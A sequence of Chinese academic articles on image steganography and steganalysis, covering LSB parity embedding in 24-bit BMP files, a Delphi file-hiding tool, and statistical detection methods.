b. 频率域检测方法。这种方法是对于图像信息在频率域中的表现特性不同,来进行隐藏图像分析的。利用这种特性可以检测图像信息是否有被嵌入隐藏信息。
信息隐藏检测技术依照检测特性还可以分为以下两种:
a. 基于签名的检测方法。这种方法是应用已知的检测工具,来进行隐藏信息分析。这种方法的优势是检测的准确率很高,并且还可以分析出隐藏信息使用的具体嵌入技术。但是对于未知的信息嵌入方式无法进行检测。
b. 基于系统的检测方法。这种方法主要通过改变数字图像的统计特性来进行检测工作,在实际应用过程中通过判断信息是否出现偏离,而确定信息的隐藏。这种方法对于一类图像的检测极为有效,较为通用。但是对于外界因素的影响阻挡较弱。
1.3 信息隐藏检测技术优劣衡量方式
无论是哪种信息隐藏检测技术,首要的都是抱着检测质量,只有保证隐藏信息检测的准确性才能进一步的对信息进行破解分析,获取隐藏信息,其次就是要注意检测的速度,一个需要几天几夜才能检测出隐藏信息的方法,就算保证了检测的准确性,但也不能说这种算法是好的、优质的。在网络信息传播如此快速的今天,速度在某种程度上也代表一切。
2 主流图像隐藏识别技术
现阶段,在图像隐藏中应用的识别技术主要有三种,分别是:
2.1 基于数字水印算法的图像隐藏信息识别技术
数字水印技术是一种新兴的信息隐藏技术,可以将秘密信息嵌入到数字媒体的冗余比特中去,从而达到不可见的目的。不同于密码术,信息隐藏技术的目的在于隐藏秘密信息的存在本身,因此具有更强的信息保密性和信息安全性。数字水印技术和隐藏信息检测技术涉及计算机、通信、编码、信号处理、数理统计、生物视觉听觉特性等知识和技术,是一个跨学科的新领域。无论是在多媒体信号中嵌入不易察觉的秘密信息,还是从大量媒体信号中检测这类秘密信息的存在性,都是富有挑战性的技术课题。
基于数字水印算法的图像隐藏信息识别技术针对LSB嵌入方式水印的改进全盲检测算法,提高了拟合的精度,减小了载体图像初始偏移量对估计准确度的影响。在不明显增加时间复杂度的前提下,改进算法在全盲情况下估计隐藏信息长度时,可以获得比其他算法更高的检测准确度,而且适用范围也很广,是一种可以快速估计待测图像中嵌入水印序列长度的算法,具有实际应用上的价值。
2.2 逆向隐藏变换算法的图像隐藏信息识别技术
在图像信息隐藏领域使用平面隐藏图像逆向变换方法,能够利用图像像素空间位置建立图像灰度分布模型,通过灰度分布模型获取灰度数值矩阵,则可以将进行置乱处理后的灰度数值进行逆向变换,从而还原初始图像。假设将上述变换方式使用到图像隐藏信息识别中,用于信息的传递和隐藏方面,尤其是用于图像隐藏信息交换方面,则能够获取理想的图像信息隐藏效果。
根据图像中的噪声,能够对图像进行隐藏信息识别。假设噪声和隐藏信息混杂在一起,造成隐藏信息特征发生形状改变。因此,无法避免由于噪声和隐藏信息混杂造成的隐藏信息特征形变的缺陷。利用逆向隐藏变换算法进行图像隐藏信息识别,需要对隐藏信息进行置乱处理,将隐藏信息嵌入到初始图像中,并利用密钥提取隐藏信息,从而实现图像隐藏信息的识别。
基于逆向隐藏变换算法的图像隐藏信息识别方法,可以对隐藏信息进行置乱处理,将信息嵌入到初始图像中,利用密钥提取隐藏信息,从而完成了图像隐藏信息的识别。这种算法提高了识别的准确率,取得了令人满意的效果。
2.3 图像隐藏信息识别创新点分析
基于图像的信息隐藏检测算法仍不成熟,还需进一步的深入研究.而支撑这种研究的重要资源就是一个可以分析、实验的软件平台.通过分析系统平台,可以进行算法的设计、分析、实验、测试.基于图像的信息隐藏分析系统平台应该具有较好的实验功能、集成现有的算法、具有良好的可扩充性,但是对系统运行的速度要求不高。
3 结论
计算机技术的发展,使人们的生产生活越来越依赖网络,信息安全性是网络信息传输的关注重点,现有的信息隐藏技术有隐写术以及数字水印技术,虽然可以保证信息的安全,但是在加密图像信息的传输过程中,很容易出现乱码等问题,所以如何在对图像信息进行加密隐层后,保证识别后的图像质量,是研究的核心,传统的三种识别技术在图像信息隐藏传输的识别上各有优势,也各有利弊,研究人员的工作依旧是任重而道远。
1 介绍
随着计算机技术和Internet的迅速发展与应用,计算机越来越应用到了人们生活的方方面面中,又由于计算机在通讯方面突出表现,使其在各种信息交换、传递的领域更是独树一帜。事有两面,在计算机进行快速信息交换的同时也带来了一定的安全性问题,对于一些高度机密的文档信息,就不能用普通的方法(如普通的U盘拷贝、发送电子邮件)进行交换和传递了。这样如何将机密文档信息在安全的情况下用现代的信息传递手段进行快速传递成为现在的一个新的研究课题。
信息隐藏技术的文档信息传输是这个课题的核心,它是将机密文档处理后隐藏到普通的BMP图片中,把隐藏有信息的图片通过计算机发送到接收方,接收方再解释出隐藏文档的方法。这种方法不同于单独发送加密文件的优点在于,不容易引起攻击者的注意。因为中间信息是类同于普通的BMP图片。这种方法的要求有两点:
隐藏信息后的彩色BMP图像与原始图像相比,在人的视觉上没有什么区别;
隐藏信息后的彩色BMP图像与原始图像相比,大小上没有多大变化;
2 BMP位图说明
BMP图像文件格式,是微软公司为其WINDOWS环境设置的标准图像格式,在Windows系统软件中包含了一系列支持BMP图像处理的API函数。随着WINDOWS操作系统在世界范围内的普及, BMP文件格式越来越多地被各种应用软件所支持。
BMP图像文件是位图文件,位图表示的是将一幅图像分割成一个个很小的栅格,每个栅格缩小为一个点称为像素,每一个像素具有自已的数值,即一幅图像是由一系列像素点构成的点阵。BMP中按第个像素数值(像素位值)的取值范围可以分为1位、4位、8位、24位图片。像素位值的大小体现了图片彩色质量的好坏,同时也决定了图片保存时占用空间的多少。①1位图片就是指黑白图片,图片中每一由黑白两种颜色组成,它是占用空间最少的位图,同时是图片质量最差的;②4位图片是16色的彩色图片,图片中每个像素位的范围为0到15,带有彩色,但彩色质量很差,占用空间小;③8位图片是256色的彩色图片,图片中每个像素位的范围为0到255,彩色质量相对好,占用空间大;④24位图片就是所说的真彩色的彩色图片,图片中每个像素位由三个字节组成,彩色质量相对好,占用空间最大;
这里讨论的主要是对24位真彩色图片的处理。
3 信息处理的原理
3.1 信息隐藏
信息隐藏就是将文档信息隐藏在真彩色BMP图片中,其流程如图1所示:
图2中,每一个点表示位图中的一个像素,每一个像素的值范围在0到16777215间。在隐藏信息时每一个像素的奇偶性作为隐藏数据的依据。如果此像素的值为偶数表示数据为0,如果此像素的值为奇数时表示数据为1,用0和1的不同排列组全表示各种数据。而这种表示方式正好与各种磁盘保存数据的方式相同(磁盘中的数据也是以0和1的方式 :二进制方式保存的)。这样从磁盘中读取出文档的内容,使位图中各个像素的奇偶性和文档内容的奇偶性对应,就在位图中隐藏了信息这个过程叫位图像素调制。其中的对应规则复杂程度是有效防止隐藏的信息被非法解读出的难易程度的体现。对应规则越复杂越难被非法解读出来。
再对位图中每行中隐藏的数据进行位异或和CRC_32校验,可以有效的验证解读出数据的有效性和正确性。信息隐藏过程举例:BMP位图第一行前8个像素的值为:13075297, 13075297, 13075297,13074781,13404000,13206622,13272413,13206620,要隐藏的数据为01010101,ASC码值为85。将像素值的奇偶性与数据比较后要作如下的调制:
第一个像素:13075297隐藏信息0,要调整为偶数13075298;
第二个像素:13075297隐藏信息1,不变;
第三个像素:13075297隐藏信息0,要调整为偶数13075298;
第四个像素:13074781隐藏信息1,不变;
第五个像素:13404000隐藏信息0,不变;
第六个像素:13206622隐藏信息1,要调整为奇数13206623;
第七个像素:13272413隐藏信息0,要调整为偶数13272414;
第八个像素:13206620隐藏信息1,要调整为奇数13206621;
经过这样的调制,此BMP位图第一行前8个像素的奇偶性便与85转化的8位二进制数完全相同,这样,8个像素就隐藏了一个字节的信息。
综上所述,将信息隐藏入BMP位图中的步骤为:
读取文件的二进制内容;
将位图每个像素的奇偶性与二进制数据进行比较;
通过调节每个像素的奇偶性便之与文件的二进制内容一致,就将信息隐藏到BMP位图中了;
3.2 信息解读
信息解读就是从隐藏有信息的BMP位图中解读出隐藏的信息,是信息隐藏的逆过程,其流程如图三所示:
信息解读过程如下:
判断BMP位图中每个像素值的奇偶性,若为偶数,则输出“0”;若为奇数,则输出“1”;
每8个像素输出8个0和1组成的二进制数据,转换为一个字节;
经过对所有像素处理,得到一系列的二进制数据,保存成文件,就是隐藏的信息。
本次实验结果如图4、图5所示。
5 总结
(1)由于原始24位BMP图像文件隐藏信息后,其像素位数值最多变化1(因为是像素位值加“1”或减“1”),该像素位代表的颜色最多只变化了1/16777216,所以,已隐藏信息的BMP图像与未隐藏信息的BMP图像,用肉眼是看不出差别的;
(2)由于此法只修改出BMP位图中每个像素的值,而没有改变像素的数量,所有在保存图片时的大小没有改变,所有隐藏了文档信息后位图的大小没有改变;
(3)使用这种方法,隐藏的文档信息是直接读取的文件,所以对文件格式没有限制,可以是TXT文件、WORD文件等。
中图分类号:TP391文献标识码:B文章编号:1009-3044(2007)16-31041-02
Development of Windows File Concealment Software Based on Information Concealment Technology
YUE Jun-mei
(Taiyuan Polytechnic Institute Yangquan, Yangquan 045000, China)
Abstract:The text introduce a simple method f of hiding file to BMP image.The size of BMP image file is not changed and the BMP image data is changed by 1/256 on color,which is not touched by eyes.The file concealment software which is developed on Delphi 2005 proves the feasibility and the validity of this method.
Key words:Information Concealment;BMP image;Delphi 2005
1 引言
如今,人们的生活与计算机已经息息相关了。我们存放在电脑内的诸多资料总是希望不为人知,利用加密软件是一招,但那样容易引起别人的注意;利用位图实现信息隐藏也是可用的一招,该方法信息隐藏率高,又无需占用任何资源。它充分利用24位BMP文件的冗余空间,把一批文件插入到这类文件中去,而不破坏原文件的结构和显示效果。这样,就可以将多个秘密文件保存于一个24位的BMP文件中,保存后的图像与原始图像相比,在人的视觉上没有什么区别。
2 BMP隐藏文件的原理
2.1 BMP图像的文件格式
BMP图像文件是位图文件,位图表示的是将一幅图像分割成栅格,栅格的每一点称为像素,每一个像素具有自已的RG值,即一幅图像是由一系列像素点构成的点阵。BMP文件由文件头、位图信息头、颜色信息和图像数据四部分组成。文件头由54个字节的数据段组成,其中包含有该位图文件的类型、大小、图像尺寸及打印格式等; 从第55个字节开始,是该文件的图像数据部分,数据的排列顺序以图像的左下角为起点,每连续3个字节便描述图像一个像素点的颜色信息,这三个字节分别代表蓝、绿、红三基色在此像素中的亮度。
2.2 BMP实现原理
一幅24位BMP图像,由54字节的文件头和图像数据部分组成,其中文件头不能隐藏信息,从第55字节以后为图像数据部分,可以隐藏信息。图像数据部分是由一系列的8位二进制数所组成,由于每个8位二进制数中“1”的个数或者为奇数或者为偶数,约定:若一个字节中“1”的个数为奇数,则称该字节为奇性字节,用“1”表示;若一个字节中“1”的个数为偶数,则称该字节为偶性字节,用“0”表示。用每个字节的奇偶性来表示隐藏的信息。将信息嵌入BMP文件的步骤为:
(1)将待隐藏信息转化为二进制数据码流;
(2)将BMP文件图像数据部分的每个字节的奇偶性与上述二进制数码流进行比较;
(3)通过调整字节最低位的“0”或“1”,改变字节的奇偶性,使之与上述二进制数据流一致,即将信息嵌入到24位BMP图像中。
由于原始24位BMP图像文件隐藏信息后,其字节数值最多变化1(因为是在字节的最低位加“1”或减“1”),该字节代表的颜色浓度最多只变化了1/256,所以,已隐藏信息的BMP图像与未隐藏信息的BMP图像,用肉眼是看不出差别的; 使用这种方法,一个大小为32 k的24位BMP图像文件,可以隐藏约32 k/8=4 k的信息(忽略文件头不能隐藏数据的54个字节),该方法具有较高的信息隐藏率
2.3 信息的提取
信息提取是把隐藏的信息从伪装BMP中读取出来,其过程和步骤正好与信息嵌入相反:
(1)判断BMP文件图像数据部分每个字节的奇偶性,若字节中“1”的个数为偶数,则输出“0”;若字节中“1”的个数为奇数,则输出“1”;
(2)每判断8个字节,便将输出的8位数组成一个二进制数(先输出的为高位);
(3)经过上述处理,得到一系列8位二进制数,便是隐藏信息的代码,将代码转换成文本,或图像,或声音,就是隐藏的信息。
3 文件隐藏大师的实现
文件隐藏大师的主要功能是可以快速隐藏本地硬盘上的可执行文件、程序源等任意文件。 所谓隐藏,就是指任何人无法通过资源浏览器,我的电脑,DOS方式等方法找到已隐藏的东西。
文件隐藏大师是基于Delphi 2005开发的,Delphi是全新的可视化编程环境,是基于Object Pascal语言的面向对象的开发工具,具有强大的数据存取功能。它的数据处理工具BDE(Borland Database Engine)是一个标准的中介软件层,可以用来处理当前流行的数据格式,如xBase、Paradox等,也可以通过BDE的SQL Link直接与Sybase、SQL Server、Informix、Oracle等大型数据库连接。
文件隐藏大师包含密码验证模块、初始化模块、添加/删除位图模块、隐藏文件模块、提取文件模块、密码管理模块、选项设置模块和关闭系统模块。
3.1 文件隐藏大师模块设计
(1)密码验证模块
设置密码验证模块的功能在于帮助用户维护系统安全。进入本系统前,必须首先通过密码验证,如图1所示,如果用户没有设置密码,则进入系统时,会跳过本模块。
图1 密码验证模块界面图
(2)初始化模块
设置初始化模块的目的在于把用户已经操作过的文件记录显示到文件列表中,以便于用户的操作。当用户经过密码验证后,程序会在注册表里读取用户先前操作过的记录,并将该记录输出到程序主界面的文件列表里,以供用户继续操作。
(3)添加/删除位图模块
设置添加/删除位图模块的目的在于把位图路径添加到文件列表中,以便于用户隐藏文件,或将无用的位图信息从文件列表中删除。添加位图:可以将想要作为模板的位图加入列表,然后再把文件隐藏到其中。删除位图:将您觉得无用的位图文件删掉。
(4)隐藏文件模块
设置隐藏文件模块的目的在于把用户的文件隐藏到位图中。隐藏文件:先在列表当中选中一幅位图,然后点击该按钮就可以选择您想要隐藏的文件了。
(5)提取文件模块
设置提取文件模块的目的在于把用户隐藏在位图中的文件提取出来。提取文件:先在列表中选择一幅已经隐藏了文件的位图,然后点击该按钮选择要保存的路径即可。
(6)密码管理模块
设置密码管理模块的目的在于提高系统的安全性。
(7)选项设置模块
可以设置在隐藏/提取文件时,系统对操作后的各个文件的自动处理。选项:在选项中您还可以设置隐藏文件使对原稿的处理,并且还可以为软件设置密码,以使其得到更好的保护。
(8)关闭系统模块
设置本模块的目的在于给用户提供退出系统的功能。
3.2文件隐藏大师功能简介
利用“文件隐藏大师”,如图2所示,可以很轻松的在瞬间把任何文件隐藏到一幅位图当中。
图2 文件隐藏大师界面图
(1)功能简介
添加位图:可以将你想要作为模板的位图加入列表,然后再把文件隐藏到其中。
删除位图:将您觉得无用的位图文件删掉。
隐藏文件:先在列表当中选中一幅位图,然后点击该按钮就可以选择您想要隐藏的文件了。
提取文件:先在列表中选择一幅已经隐藏了文件的位图,然后点击该按钮选择要保存的路径即可。
选项:在选项中您还可以设置隐藏文件使对原稿的处理,并且还可以为软件设置密码,以使其得到更好的保护。
(2)软件的详细操作步骤
隐藏文件操作步骤:
①使用“添加位图”按钮,添加一幅24位色的位图到文件列表当中;
②在文件列表中选择一个位图文件后,点击“隐藏文件”按钮,然后选择一个你想要隐藏的文件。
提取文件操作步骤:
①在文件列表中选择一个位图文件后,软件底部会显示有关被隐藏文件的信息;
②点击“提取文件”按钮,选择目录后,就会将隐藏的文件提取到该目录下。
4 软件的测试
软件开发完毕后应与系统中其它成分集成在一起,验证系统各部件是否都能完成所赋予的任务。下面将文件隐藏大师进行测试,测试要点如表1所示:
表1 文件隐藏大师测试要点
经过上述的测试过程对软件进行测试后,软件基本满足开发的要求,测试结束,软件试运行。载入的原始位图图像如图3所示,隐藏文件后的位图图像如图4所示。由于该方法只对位图颜色浓度变化了1/256,对原始图像的数据影响不大, 所以两幅图像质量没有变化。
5 结束语
文件隐藏大师可以轻松的把任意类型的文件隐藏到一幅24位色的位图当中,从而实现隐藏文件的目的,它是目前流行的Windows 优化管理软件如:Windows优化大师、超级兔子等所不具备的功能,具有一定的价值。
参考文献:
[1]Elke Franz.Steganography preserving statistical properties[A].Lecture Notes in Computer Science 5th International Workshop on Information Hiding[C].Noordwijkerhout,The Netherlands.2002.2578.
[2]乔小燕.孙兴华.杨静宇.基于视觉冗余性的图像信息隐藏[J].计算机应用,2006,26(1): 96-98.
[3]赵君,王乘. 图像格式分析与图像显示实现[J]. 计算机与数字工程,2004,32(5).
中图分类号:TP391.41 文献标识码:A 文章编号:1674-7712 (2013) 20-0000-01
随着计算机以及网络技术的高速发展,网络时代和数字时代己经拉开了帷幕,但同时也跟我们带来了很多问题。比如一些绝密的信息以及文件能否在互联网中安全传输;个人的隐私能否得到相应的保障;一些公司、企业的商业机密会不会被他人窃取;多媒体的版权维护问题等。信息安全得到了国内外各界的高度重视。
由此,一门新兴的学科——信息隐藏(Information Hiding)应运而生。它的主要原理是利用了人类的感觉器官对数字信号的冗余,从而把一个有用的消息(即隐秘信息)伪装隐藏在另外一个载体信息中,并且这个载体信息是可以公开的在信道里面传输的,隐秘之后就可以得到一个隐蔽载体,从而能够实现隐秘信息在信道中的隐蔽通信。在传送过程中,第三方很难知道一个看似普通信息中是否隐含了其他的隐秘信息,就算知道也很难将其提取出来。
信息隐藏技术目前主要包括两个方面:数字水印和信息隐写。数字水印主要是对数字媒体起标识以及版权保护作用;信息隐写则是将隐秘信息伪装隐藏于其它的载体信息中。很多地方将数字水印技术作为一个单独的分支拿出来做研究,同样本文对数字水印也不做过多研究。信息隐藏技术是一把双刃剑,一方面信息隐藏技术能够为政治、军事以及经济的机密信息在互联网中的传输提供可靠的保障,个人在公共网络中的安全和隐私也可以得到很好的保护;另一方面,也有可能被某些怀有不当目的的个人或者组织所利用,在网络中传播一些非法或破坏性的信息,从而对社会的公共安全以及国家安全造成了很大的危害。因此我们在学习、研究信息隐藏技术里这个“矛”的时候,也应该学习、研究其“盾”(隐写分析技术)。
一、信息隐藏技术
信息隐藏技术和传统的密码技术相比,相同点是二者都是为了保证隐秘信息的安全。不同的则是密码技术是对秘密信息进行特殊的编码从而形成了第三方不可识别的密文。信息隐藏是将秘密信息伪装隐藏于另外一个可以公开传递的载体信息之中,通过此载体信息在网络上传输来传递隐秘信息。传统密码技术由于密文是杂乱的,所以很容易被第三方辨认出来,这样的话第三方的目的就很明确了,一旦截获了密文,全力去破解即可。但是对信息隐藏技术来说,仅通过视觉无法判断出载体信息是否含有隐秘信息,因此面对互联网的海量信息,第三方在短时间内很难辨别出数字媒体是否包含有隐秘信息。因而跟传统的密码技术相比信息隐藏技术能更有效地保证隐秘信息的安全。信息隐藏技术模型如图1所示,隐秘信息通过密钥伪装隐藏到载体信息之中,然后通过公共信道传输给接收对象,接收对象接收到信息以后根据密钥就可以提取出想要得到的隐秘信息。在公共信道中,首先第三方很难察觉到载体信息中有隐秘信息,就算察觉到了,也很难提取出隐秘信息。
信息隐藏技术发展至今出现了许多经典的算法,在图像中嵌入隐秘信息的算法大致可以分为空域算法和变换域算法两种。空域方法包括使用LSB编码、用图像处理或压缩、变换算法对图像的属性进行修改。基本原理就是利用图像本身的冗余性和人眼对图像颜色或者灰度的分辨率的感官特性实现的信息隐藏。隐藏后并不改变载体图像的使用价值和基本特征,隐秘前后仅靠肉眼基本看不出图像差别。经典算法大概包括:最低有效位算法,调色板方法以及Patchwork算法。而对于变换域的隐藏方法主要是使用离散傅立叶变换(DFT),离散余弦变换(DCT)或者小波变换在图像中嵌入信息。变换可以基于整个图像,也可以对整个图像进行分块操作。经典算法大概包括:DFT变换域算法,DCT变换域算法以及DWT变换域算法。
二、隐写分析技术
自古有矛就有盾,隐写分析技术是指对被表明为正常的图像、音频、视频等多媒体信号进行检测,判断其中是否嵌有秘密信息,甚至只是指出媒体中是否存在秘密信息的可能性大小。它的基本原理是根据载体信息在隐写前后的统计特性的变化,从而能够分辨出载体信息是否包含有隐秘信息。一般原始图像的特性是比较连续、光滑的而且像素之间具有较高的相关性。而隐秘图像一般都是随机的比特流,而且与原始的载体信息之间相互独立,所以图像相邻像素之间的相关性将会大大降低。隐写分析技术从某种程度上说其实就是两类分类的模式识别问题,其关键是特征的选择,好的特征能较好的帮助我们判断出载体是否含有隐秘信息。
针对某种特定隐写术的隐写分析可分为空域分析和变换域分析。空域隐写分析主要攻击对象是空域LSB隐写算法,主要包括有EZStego,s-Tool等。经典的分析算法包括直方图分析法、x2分析法、RS分析法等。变换域隐写分析的主要攻击对象为DCT域隐写术,它包括有Jsteg、Outguess、F5以及MB等,变换域隐写分析主要思路是DCT系数在隐写前后特性会发生变化。通用隐写分析主要根据图像隐写前后总体或者局部统计特性的变化,然后选取统计特征向量进行训练,最后通过分类器进行有效分类。
三、总结和展望
综上所述,信息隐藏技术与隐写分析技术已成为了当下一个热点问题,应用于越来越多的领域,二者相互制约,相互促进。但是它们现在都还处在一个发展阶段,还有很多问题需要我们去解决。对隐写分析来说,现在有很多种方法可以检测出图像是否含有隐秘信息,但要估计出隐秘信息的长度,甚至提取出隐秘信息,现在仍然难以做到,这也将是以后研究工作的重点和难点。同时特征的选取,分类器的设计以及降维技术都还存在可以优化的空间。
[10]郝慧珍,傅汝林.基于IP伪装的网络安全技术研究[J].成都理工学院学报,2002,29(3):315-319.